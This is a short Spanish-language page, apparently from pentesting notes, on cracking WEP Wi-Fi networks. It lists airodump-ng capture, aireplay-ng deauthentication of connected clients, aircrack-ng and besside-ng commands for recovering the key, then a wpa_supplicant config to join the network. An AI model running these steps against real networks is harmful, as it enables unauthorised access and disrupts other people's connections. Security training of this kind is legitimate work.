WEP

Al usar RC4 con claves de 64bits o 128bits para cifrar las comunicaciones, es declarado vulnerable y obsoleto desde 2003, que fue sustituido por WPA, por lo que es altamente recomendable no usar estas redes.

Obtener contraseña de la red

En primer lugar tenemos que identificar el BSSID del punto de acceso, de forma que interceptamos el tráfico de este punto de acceso.

Hay varias formas de obtener la contraseña de la red:

  1. Con clientes conectados

airodump-ng -band abg -b [BSSID] -c [canal] -w escaneo [wlan0mon]

Para generar más tráfico, podemos desautenticar a los clientes conectados

aireplay-ng -0 0 -a [BSSID] [wlan0mon]

Una vez hemos capturado tráfico durante un tiempo relevante, 

aircrack-ng escaneo-01.cap -w [rutaDiccionario]

  1. Con besside-ng

airmon-ng check kill
besside-ng -c [canal] -b [BSSID] [wlan1] -v

Conexión a la red

Teniendo la contraseña de la red podemos conectarnos generando el fichero de configuración de la red "wpa_supplicant_ESSID.conf"

network={
  ssid=[ESSID] // el nombre de la red
  key_mgmt=NONE
  wep_key0=[PASSWORD] // la contraseña de la red
  wep_tx_keyidx=0
}

Para conectarnos a la red usaremos

wpa_supplicant -c [wpa_supplicant_ESSID.conf] -i [wlan1]

Recursos y enlaces de referencia

PreviousWifiNextWPS

Last updated